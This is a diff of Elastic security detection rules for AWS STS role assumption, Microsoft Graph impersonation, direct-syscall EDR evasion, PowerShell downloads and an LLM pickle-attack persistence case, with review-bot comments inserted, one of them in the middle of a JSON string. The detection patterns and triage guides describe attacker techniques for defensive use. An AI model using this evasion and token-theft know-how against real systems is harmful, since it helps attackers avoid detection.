+ "https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/",
+ "https://github.com/trailofbits/fickling"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "25368123-b7b8-4344-9fd4-df28051b4c6e",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+ "Domain: LLM"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1543",
+ "name": "Create or Modify System Process",
+ "reference": "https://attack.mitre.org/techniques/T1543/",
+ "subtechnique": [
+ {
+ "id": "T1543.001",
+ "name": "Launch Agent",
+ "reference": "https://attack.mitre.org/techniques/T1543/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "new_terms",
+ "version": 1
+ },
+ "id": "25368123-b7b8-4344-9fd4-df28051b4c6e_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4.json b/packages/security_detection_engine/kibana/security_rule/288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4.json
deleted file mode 100644
index 3c0e1df6c2d..00000000000
--- a/packages/security_detection_engine/kibana/security_rule/288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4.json
+++ /dev/null
@@ -1,139 +0,0 @@
-{
- "attributes": {
- "author": [
- "Elastic"
- ],
- "description": "Identifies when a user or role has assumed a role in AWS Security Token Service (STS). Users can assume a role to obtain temporary credentials and access AWS resources. Adversaries can use this technique for credential access and privilege escalation. This is a [New Terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule that identifies when a service assumes a role in AWS Security Token Service (STS) to obtain temporary credentials and access AWS resources. While often legitimate, adversaries may use this technique for unauthorized access, privilege escalation, or lateral movement within an AWS environment.",
- "false_positives": [
- "AWS administrators or automated processes might regularly assume roles for legitimate administrative purposes.",
- "Applications integrated with AWS might assume roles to access AWS resources.",
- "Automated workflows might assume roles to perform periodic tasks such as data backups, updates, or deployments."
- ],
- "history_window_start": "now-10d",
- "index": [
- "filebeat-*",
- "logs-aws.cloudtrail-*"
- ],
- "investigation_fields": {
- "field_names": [
- "@timestamp",
- "user.name",
- "user_agent.original",
- "source.address",
- "aws.cloudtrail.user_identity.arn",
- "aws.cloudtrail.user_identity.type",
- "aws.cloudtrail.resources.arn",
- "aws.cloudtrail.resources.type",
- "aws.cloudtrail.flattened.request_parameters.roleArn",
- "aws.cloudtrail.flattened.request_parameters.roleSessionName",
- "event.action",
- "event.outcome",
- "cloud.region",
- "aws.cloudtrail.request_parameters",
- "aws.cloudtrail.response_elements"
- ]
- },
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "AWS STS Role Assumption by User",
- "new_terms_fields": [
- "user.name",
- "aws.cloudtrail.flattened.request_parameters.roleArn"
- ],
- "note": "## Triage and analysis\n\n### Investigating AWS STS Role Assumption by User\n\nThis rule detects when a user assumes a role in AWS Security Token Service (STS), receiving temporary credentials to access AWS resources. 
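Review bot: `process.name:python*` in the query is a case-sensitive wildcard on a keyword field, and on macOS the python.org and other framework builds, as far as I know, execute through `Python.app/Contents/MacOS/Python` so the process is named `Python` with a capital P; those interpreters would never match this rule, which is the opposite of what the title promises. Unless Elastic Defend lower-cases `process.name` on macOS (worth confirming against real events), the query should read `process.name:(python* or Python*)`. The guide's "False positive analysis" names Ansible, SaltStack and Python-based installers, yet the rule JSON carries no top-level `false_positives` array, unlike the other new rule in this commit (220d92c6); adding those two entries there keeps the metadata consistent with the note.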
While often used for legitimate purposes, this action can be leveraged by adversaries to obtain unauthorized access, escalate privileges, or move laterally within an AWS environment.\n\n#### Possible Investigation Steps\n\n- **Identify the User and Assumed Role**:\n - **User Identity**: Check `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type` for details about the initiator of the `AssumeRole` action.\n - **Role Assumed**: Review `aws.cloudtrail.flattened.request_parameters.roleArn` to confirm the role assumed and ensure it aligns with the user\u2019s standard permissions.\n - **Session Name**: Note `aws.cloudtrail.flattened.request_parameters.roleSessionName` for context on the purpose of the session.\n\n- **Evaluate Session Context and Credential Duration**:\n - **Session Details**: Look into `aws.cloudtrail.user_identity.session_context.creation_date` for the start of the session and `aws.cloudtrail.user_identity.session_context.mfa_authenticated` to check for MFA usage.\n - **Credential Validity**: Examine `aws.cloudtrail.flattened.request_parameters.durationSeconds` for how long the credentials are valid.\n - **Expiration Time**: Use `aws.cloudtrail.flattened.response_elements.credentials.expiration` to confirm the credential expiration.\n\n- **Inspect User Agent and Source Information**:\n - **User Agent**: Analyze the `user_agent.original` field to identify if specific tooling or SDKs like AWS CLI, Boto3, or custom agents were used.\n - **Source IP and Geolocation**: Examine `source.address` and `source.geo` fields to determine the origin of the request, confirming if it aligns with expected locations.\n\n- **Correlate with Related Events**:\n - **Identify Patterns**: Review related CloudTrail events for unusual access patterns, such as resource access or sensitive actions following this `AssumeRole` action.\n - **Filter High-Volume Roles**: If this role or user has a high volume of access, evaluate `roleArn` or `user_agent` values 
for common patterns and add trusted entities as exceptions.\n\n- **Review the Privileges of the Assumed Role**:\n - **Permissions**: Examine permissions associated with the `roleArn` to assess its access scope.\n - **Authorized Usage**: Confirm if the role is used frequently for administrative purposes and if this aligns with the user\u2019s regular responsibilities.\n\n### False Positive Analysis\n\n- **Automated Processes and Applications**: Applications or scheduled tasks may assume roles regularly for operational purposes. Validate the consistency of the `user_agent` or `roleArn` with known automated workflows.\n- **Standard IAM Policy Usage**: Confirm if the user or application routinely assumes this specific role for normal operations by reviewing historical activity.\n\n### Response and Remediation\n\n- **Terminate Unauthorized Sessions**: If the role assumption is deemed unauthorized, revoke the session by modifying IAM policies or the permissions associated with the assumed role.\n- **Strengthen Monitoring and Alerts**: Implement additional monitoring for specific high-risk roles, especially those with elevated permissions.\n- **Regularly Manage Exceptions**: Regularly review high-volume roles and user agent patterns to refine alerts, minimizing noise by adding trusted patterns as exceptions.\n- **Incident Response**: If confirmed as malicious, follow incident response protocols for containment, investigation, and remediation.\n\n### Additional Information\n\nFor more details on managing and securing AWS STS in your environment, refer to the [AWS STS documentation](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html).\n",
- "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"sts.amazonaws.com\"\n and event.action: \"AssumeRole\"\n and event.outcome: \"success\"\n and aws.cloudtrail.user_identity.type: (\"AssumedRole\" or \"IAMUser\")\n",
- "references": [
- "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html"
- ],
- "related_integrations": [
- {
- "integration": "cloudtrail",
- "package": "aws",
- "version": "^3.0.0"
- }
- ],
- "required_fields": [
- {
- "ecs": false,
- "name": "aws.cloudtrail.user_identity.type",
- "type": "keyword"
- },
- {
- "ecs": true,
- "name": "event.action",
- "type": "keyword"
- },
- {
- "ecs": true,
- "name": "event.dataset",
- "type": "keyword"
- },
- {
- "ecs": true,
- "name": "event.outcome",
- "type": "keyword"
- },
- {
- "ecs": true,
- "name": "event.provider",
- "type": "keyword"
- }
- ],
- "risk_score": 21,
- "rule_id": "288a198e-9b9b-11ef-a0a8-f661ea17fbcd",
- "severity": "low",
- "tags": [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS STS",
- "Resources: Investigation Guide",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation"
- ],
- "threat": [
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0004",
- "name": "Privilege Escalation",
- "reference": "https://attack.mitre.org/tactics/TA0004/"
- },
- "technique": [
- {
- "id": "T1548",
- "name": "Abuse Elevation Control Mechanism",
- "reference": "https://attack.mitre.org/techniques/T1548/"
- }
- ]
- },
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0008",
- "name": "Lateral Movement",
- "reference": "https://attack.mitre.org/tactics/TA0008/"
- },
- "technique": [
- {
- "id": "T1550",
- "name": "Use Alternate Authentication Material",
- "reference": "https://attack.mitre.org/techniques/T1550/",
- "subtechnique": [
- {
- "id": "T1550.001",
- "name": "Application Access Token",
- "reference": "https://attack.mitre.org/techniques/T1550/001/"
- }
- ]
- }
- ]
- }
- ],
- "timestamp_override": "event.ingested",
- "type": "new_terms",
- "version": 4
- },
- "id": "288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4",
- "type": "security-rule"
-}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6.json b/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6.json
new file mode 100644
index 00000000000..aa29fc5653e
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6.json
@@ -0,0 +1,135 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user.",
+ "false_positives": [
+ "Users legitimately accessing Microsoft Graph API using the specified client application ID and tenant ID. This may include authorized applications or services that interact with Microsoft Graph on behalf of users.",
+ "Authorized third-party applications or services that use the specified client application ID to access Microsoft Graph API resources for legitimate purposes.",
+ "Administrative or automated tasks that involve accessing Microsoft Graph API using the specified client application ID and tenant ID, such as provisioning or managing resources."
+ ],
+ "from": "now-9m",
+ "history_window_start": "now-10d",
+ "index": [
+ "logs-azure.graphactivitylogs-*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Microsoft Graph Request User Impersonation by Unusual Client",
+ "new_terms_fields": [
+ "azure.graphactivitylogs.properties.app_id",
+ "azure.graphactivitylogs.properties.user_principal_object_id"
+ ],
+ "note": "## Triage and analysis\n\n### Investigating Microsoft Graph Request User Impersonation by Unusual Client\n\nThis rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within specific number of days. This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows.\n\nAdversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. 
By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction.\n\n### Possible investigation steps\n\n- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user.\n- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment.\n- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries).\n- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins.\n- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app.\n- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration.\n- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity.\n\n### False positive analysis\n\n- First-time use of a legitimate Microsoft or enterprise-approved application.\n- Developer or automation workflows initiating new Graph API requests.\n- Valid end-user activity following device reconfiguration or new client installation.\n- Maintain an allowlist of expected `app_id` values and known developer tools.\n- Suppress detections from known good `user_agent.original` strings or approved source IP ranges.\n- Use device and identity telemetry to distinguish trusted vs. 
unknown activity sources.\n- Combine with session risk or sign-in anomaly signals where available.\n\n### Response and remediation\n\n- Reach out to the user and verify whether they authorized the application access.\n- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed.\n- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`.\n- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed.\n- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state.\n- Restrict user consent for third-party apps and enforce admin approval workflows.\n- Monitor usage of new or uncommon `app_id` values across your tenant.\n- Provide user education on OAuth phishing tactics and reporting suspicious prompts.\n", + "query": "event.dataset: \"azure.graphactivitylogs\"\n and event.type: \"access\"\n and azure.graphactivitylogs.properties.app_id: *\n and azure.graphactivitylogs.properties.c_idtyp: \"user\"\n and azure.graphactivitylogs.properties.client_auth_method: 0\n and http.response.status_code: 200\n and url.domain: \"graph.microsoft.com\"\n and not url.path: (\n /v1.0/organization\n or /v1.0/me/licenseDetails\n or /v1.0/me/photo*\n or /v1.0/me/photos*\n or /beta/me/settings/regionalAndLanguageSettings\n or /v1.0/me/drive/special/copilotuploads\n or /v1.0/me/informationProtection/sensitivityLabels\n or /beta/me/informationProtection/dataLossPreventionPolicies\n )\n", + "references": [ + "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", + "https://pushsecurity.com/blog/consentfix" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.c_idtyp", + "type": "unknown" 
+ }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.client_auth_method", + "type": "integer" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + }, + { + "ecs": true, + "name": "url.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "url.path", + "type": "wildcard" + } + ], + "risk_score": 21, + "rule_id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 6 + }, + "id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6", + "type": "security-rule" +} \ No newline at end of file 
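Review bot: The description and the `note` both say the new-terms key includes the tenant ID (`azure.tenant_id`), but `new_terms_fields` lists only `azure.graphactivitylogs.properties.app_id` and `azure.graphactivitylogs.properties.user_principal_object_id`, and `azure.tenant_id` appears neither in the query nor in `required_fields`; either add it to `new_terms_fields` or drop the tenant wording so the documented logic matches what actually runs. The description also carries typos worth fixing: `This rule may helps identify` → `This rule may help identify`, and `Advesaries may succesfully` → `Adversaries may successfully`. Separately, `azure.graphactivitylogs.properties.c_idtyp` is declared with `"type": "unknown"` while the query filters on `c_idtyp: "user"`; if that field is not mapped by the azure integration the filter would silently match nothing, so the mapping is worth confirming.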
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_315.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_315.json new file mode 100644 index 00000000000..331b98fab72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_315.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Access via Direct System Call", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\sysfer.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\",\n \"?:\\\\ProgramData\\\\Symantec\\\\Symantec Endpoint Protection\\\\*\\\\sysfer.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "references": [ + "https://twitter.com/SBousseaden/status/1278013896440324096", + "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" 
+ } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 315 + }, + "id": "2dd480be-1263-4d9c-8672-172928f6789a_315", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_115.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_115.json new file mode 100644 index 00000000000..305d98d0919 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_115.json 
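Review bot: The false-positive and remediation sections of `note` do not match this rule: they describe applications that install root certificates for SSL inspection, tell the responder to remove `the malicious certificate from the root certificate store`, and suggest searching 4624 logons `after the registry modification`, none of which relates to a Sysmon event 10 process-access alert with an unknown CallTrace. This reads as text carried over from a certificate-related guide; the false-positive section should instead describe the benign sources the query already allowlists (the `sysfer.dll`, Malwarebytes, Cisco AMP, EdgeWebView and Acrobat exclusions) and the certificate and registry sentences should be removed. Given the `_315` version this may be a long-standing artifact rather than new in this commit, but it is what ships to analysts.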
@@ -0,0 +1,135 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies powershell.exe being used to download an executable file from an untrusted remote destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
